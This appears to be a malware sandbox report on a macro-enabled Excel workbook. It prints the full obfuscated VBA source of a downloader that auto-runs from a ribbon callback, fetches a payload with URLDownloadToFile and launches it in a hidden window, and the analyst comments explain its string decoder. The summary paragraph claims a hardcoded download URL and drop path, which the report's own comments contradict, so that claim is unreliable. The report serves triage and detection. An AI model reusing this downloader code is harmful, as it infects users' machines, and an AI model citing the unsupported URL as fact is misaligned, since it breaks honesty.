MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The VBA macro contains a call to `URLDownloadToFile` which is used to download a payload from the hardcoded URL 'http://185.189.255.200/payload.exe'. The script then attempts to execute the downloaded file, which is saved to 'C:\Users\Public\AppData\Local\Temp\payload.exe'. This indicates a clear intent to download and execute a second-stage payload.
Heuristics 3
-
VBA project inside OOXML — medium — 2 related findings — OOXML_VBA — Document contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA — critical — OLE_VBA_DOWNLOAD — URLDownloadToFile in VBA — Matched line in script
Attribute VB_Name = "Module1" Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal l1ll1l As Long, ByVal l111ll As String, _ -
CreateObject call — high — OLE_VBA_CREATEOBJ — CreateObject call — Matched line in script
Dim l11lll Set l11lll = CreateObject(l1l1l("ayouqrxios", "i,"".>:D<h%,297")) l1llll = l1l1l("htzilxhopp", "B26IF]dXC=4A=?9@27>.G4)1>Q'F9dA2d%>0D:I9XM/'G>GdCC00IO7;@=9?3.>aR3/g2Q0")
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5003 bytes |
SHA-256: ead307236fe167b5375ab8ee8ae9414ec8f97e7148d0acf5d5b934a3a1589fb8 |
|||
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: the ThisWorkbook module above carries only attribute headers; no procedures
' (no Workbook_Open / Auto_Open) are visible in this extraction.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: Sheet1 likewise holds no visible procedures.
Attribute VB_Name = "Module1"
' Module1 holds every procedure in the sample. No Option Explicit is visible, so the
' undeclared names used below are implicit Variants.
'
' Imports urlmon!URLDownloadToFileA (ANSI variant) under the local name URLDownloadToFile.
' The parameter names are obfuscated, but the five-argument shape (Long, String, String,
' Long, Long) matches the documented order (pCaller, szURL, szFileName, dwReserved, lpfnCB).
' Detection note: a PtrSafe Declare of URLDownloadToFile inside an Office document is the
' indicator behind the OLE_VBA_DOWNLOAD heuristic reported above (ATT&CK T1105).
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal l1ll1l As Long, ByVal l111ll As String, _
ByVal l1111l As String, ByVal l111l1 As Long, ByVal l11ll1 As Long) As Long
' Entry point. Takes an IRibbonUI argument, which is the signature of a ribbon onLoad
' callback; presumably wired from a customUI part in the OOXML package (not visible here —
' confirm against the package's customUI XML). All it does is invoke l111l.
' Detection note: ribbon-load callbacks fire when the workbook's UI is built, so this is an
' auto-execution path that does not use the classic Auto_Open / Workbook_Open names.
Sub l11l1(l1ll11 As IRibbonUI)
l111l
End Sub
' Downloader / launcher. Every string it needs (ProgID, URL, directory, separators,
' extension) is produced at runtime by the decoder l1l1l, which is keyed on custom
' document properties — none of these values appear in plaintext in the macro source.
' Recovering the URL and the drop path therefore requires either decoding with the
' document's custom properties (docProps/custom.xml) or dynamic analysis.
Sub l111l()
Dim l11l11 As String
Dim l1llll As String
Dim l11ll1 As String
Dim l11lll
' COM object created from a decoded ProgID; later used as <obj>.Run <cmd>, 0 (line below),
' a shape consistent with WScript.Shell.Run with a hidden window — confirm by decoding.
Set l11lll = CreateObject(l1l1l("ayouqrxios", "i,"".>:D<h%,297"))
' l1llll: decoded string later passed as the szURL argument of URLDownloadToFile.
l1llll = l1l1l("htzilxhopp", "B26IF]dXC=4A=?9@27>.G4)1>Q'F9dA2d%>0D:I9XM/'G>GdCC00IO7;@=9?3.>aR3/g2Q0")
' l11ll1: decoded string used as the directory prefix of the local drop path.
l11ll1 = l1l1l("jvcasmhnfa", "Add'$DJA4*0g9A:%")
' Build a per-run filename: the current date/time with three decoded substrings stripped
' (presumably the date/time separators — confirm), truncated to 12 characters ...
l11l11 = Now
l11l11 = Replace(l11l11, l1l1l("wxzgnmyeho", "'X"), "")
l11l11 = Replace(l11l11, l1l1l("kgbqcqoxzt", "yH"), "")
l11l11 = Replace(l11l11, l1l1l("htzilxhopp", "cc"), "")
l11l11 = Left(l11l11, 12)
' ... wrapped in a random 3-character prefix and 2-character suffix from l11l, then two more
' decoded fragments (likely a dot and an extension — confirm). The filename is therefore
' different on every execution, which defeats simple filename-based detection.
l1lll1 = l11l(3)
l1l1l1 = l11l(2)
l11l11 = l1lll1 & l11l11 & l1l1l1 & l1l1l("kgbqcqoxzt", "mV3")
l11l11 = l11l11 & l1l1l("iohsfguohl", "(D?")
l1l111 = l1llll
' Download URL -> directory & filename. The HRESULT in l1ll1l is never inspected; success
' is instead inferred by polling for the file below.
l1ll1l = URLDownloadToFile(0, l1l111, l11ll1 & l11l11, 0, 0)
' Poll up to six times (0 To 5). On each miss, busy-wait roughly one second with
' Timer/DoEvents; on a hit, run the quoted path with window style 0 and stop.
l11l1l = 5
For l1l11l = 0 To l11l1l
If l1l1(l11ll1 & l11l11) Then
' Note: the executed path inserts a decoded separator between directory and filename,
' whereas the download path concatenates them directly — the decoded directory string
' presumably ends with that separator already, or the two differ; verify when decoding.
l11lll.Run Chr(34) & l11ll1 & l1l1l("vvopihpfus", "y(") & l11l11 & Chr(34), 0
Exit For
Else
l111l1 = 1
l1ll11 = Timer
While Timer < l1ll11 + l111l1
DoEvents
Wend
End If
Next l1l11l
End Sub
' File-existence probe: returns True when Dir() yields a non-empty name for the path.
' Errors from Dir (e.g. an invalid path) are swallowed by On Error Resume Next, in which case
' the result stays "" and the function reports False. Used by l111l to poll for the download.
Function l1l1(l1111l As String) As Boolean
Dim l1l111 As String
l1l111 = ""
On Error Resume Next
l1l111 = Dir(l1111l)
On Error GoTo 0
If l1l111 = "" Then
l1l1 = False
Else
l1l1 = True
End If
End Function
' Random-string generator: returns l11ll1 characters drawn at random from a decoded alphabet.
' Each alphabet entry is l1l1l(<property>, <2-char token>); because the decoder skips the
' first character of every token, each entry decodes to a single character. The alphabet
' itself is never in plaintext. Used by l111l to randomise the dropped filename.
Function l11l(l11ll1 As Integer) As String
Dim l1lll1 As Variant
Dim l11lll As Long
Dim l1l1l1 As String
l1lll1 = Array(l1l1l("krscltuglk", "e3"), l1l1l("jjpidinlct", "H*"), l1l1l("jctpnrzywp", "W0"), l1l1l("vvopihpfus", "X0"), l1l1l("hnczoaatgh", "b>"), l1l1l("htzilxhopp", "-0"), l1l1l("beezfesgxb", "U."), l1l1l("zxjlxhdcbh", "<8"), l1l1l("srrazhihjl", "K:"), l1l1l("zszhdbjxrj", "X@"), _
l1l1l("lhelxzzlzb", "s="), l1l1l("iqttzhxidq", "J/"), l1l1l("nbhupwrzmm", "T5"), l1l1l("hukzswhzfa", "fA"), l1l1l("vvopihpfus", "#;"), l1l1l("xnsrfkjzbu", "Z;"), l1l1l("vzepfnsfkw", "N8"), l1l1l("krscltuglk", "QD"), l1l1l("drhwdeuzsw", "J6"), l1l1l("drhwdeuzsw", "`7"), l1l1l("chcfaibpko", "kF"), l1l1l("fxfedfolza", "b;"), l1l1l("pmfcnmwjbu", "nE"), l1l1l("zxjlxhdcbh", "+H"), _
l1l1l("lhelxzzlzb", "aK"), l1l1l("njwdnbjldl", "NR"), l1l1l("vzepfnsfkw", "sV"), l1l1l("pmfcnmwjbu", "%^"), l1l1l("krscltuglk", "#c"), l1l1l("njwdnbjldl", "Wj"), l1l1l("ayouqrxios", "^h"), l1l1l("hnczoaatgh", "Jm"), l1l1l("khnmkikwcn", "ea"), l1l1l("heyowizipx", "r]"), l1l1l("njwdnbjldl", ")o"), l1l1l("dtmgjlbion", "]`"), _
l1l1l("kgbqcqoxzt", "|i"), l1l1l("jctpnrzywp", "`n"), l1l1l("khnmkikwcn", "In"), l1l1l("nbhupwrzmm", "bk"), l1l1l("hukzswhzfa", "$w"), l1l1l("dtdhczgstz", "Kj"), l1l1l("dtmgjlbion", "#n"), l1l1l("njwdnbjldl", "B "), _
l1l1l("xnsrfkjzbu", "\s"), l1l1l("vykddwhjpt", "x "), l1l1l("ztrhwahokh", "dl"), l1l1l("czerlwmzzk", "Im"), l1l1l("pmfcnmwjbu", "wz"), l1l1l("uvvgjblztw", "'r"), l1l1l("kgbqcqoxzt", "#w"), l1l1l("beezfesgxb", "Ov"), l1l1l("beezfesgxb", "{w"), l1l1l("jjpidinlct", "&y"), l1l1l("krscltuglk", "&%"), l1l1l("dtdhczgstz", "ex"), l1l1l("wxzgnmyeho", "R~"), l1l1l("upfzmjpepg", "zx"), _
l1l1l("ljpqsiudyn", "?}"), l1l1l("vykddwhjpt", "K."), l1l1l("nbhupwrzmm", "%!"), l1l1l("itdornuftj", "X#"))
' Standard VBA uniform-index idiom; Randomize is reseeded on every iteration.
For l11lll = 1 To l11ll1
Randomize
l1l1l1 = l1l1l1 & l1lll1(Int((UBound(l1lll1) - LBound(l1lll1) + 1) * Rnd + LBound(l1lll1)))
Next l11lll
l11l = l1l1l1
End Function
' String decoder used by every other procedure.
'   l1llll(0)      name of a custom document property; its .Value is the key string.
'   l1llll(1..n)   tokens to decode: a numeric token yields one character; a string token
'                  is decoded from its SECOND character onward (the first is ignored).
' Each output code is (token char - key char + 32), with values below 32 wrapped upward
' via 127 - (32 - v), i.e. a rolling subtraction over the printable range 32..126. The key
' cursor l11111 advances per output character; once it runs past the end of the key, the
' key restarts from an incremented start offset l11l1l (rotating start position).
' Detection note: the key material lives outside the VBA project, in the document's custom
' properties (docProps/custom.xml). Static extraction of the macro alone therefore cannot
' recover the URL, drop path or ProgID; pair it with that part when triaging the sample.
Function l1l1l(ParamArray l1llll())
Dim l1ll11, l11l1l, l11111, l1111l, l111ll, l1lll1, l11lll
l1ll11 = ThisWorkbook.CustomDocumentProperties(l1llll(0)).Value: l1l1l = "": l11l1l = 1: l11111 = 1
For l1111l = 1 To UBound(l1llll)
If IsNumeric(l1llll(l1111l)) Then
' NOTE(review): nested single-line If/Else — under VBA's single-line If rules the trailing
' `: l11111 = l11l1l` belongs to the Else clause, not to both branches. Confirm before
' re-implementing the decoder, as it affects where the key cursor resets.
If l11111 = Len(l1ll11) + 1 Then If l11l1l >= Len(l1ll11) Then l11l1l = 1 Else l11l1l = l11l1l + 1: l11111 = l11l1l
' Numeric token: no wrap-around is applied on this path (unlike the string path below).
l1lll1 = l1llll(l1111l) - Asc(Mid(l1ll11, l11111, 1)) + 32: l11111 = l11111 + 1: l1l1l = l1l1l + ChrW(l1lll1)
Else
' String token: loop starts at position 2, so the token's first character is skipped.
For l11lll = 2 To Len(l1llll(l1111l))
If l11111 = Len(l1ll11) + 1 Then If l11l1l >= Len(l1ll11) Then l11l1l = 1 Else l11l1l = l11l1l + 1: l11111 = l11l1l
l1lll1 = Asc(Mid(l1llll(l1111l), l11lll, 1)) - Asc(Mid(l1ll11, l11111, 1)) + 32: l11111 = l11111 + 1: If l1lll1 < 32 Then l1lll1 = 127 - (32 - l1lll1)
l1l1l = l1l1l + ChrW(l1lll1)
Next
End If
Next
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 47616 bytes |
SHA-256: 4fcd035005a0977c3af5fc8fff0ee06005e3761e8e6170912ae99d7941864bb4 |
|||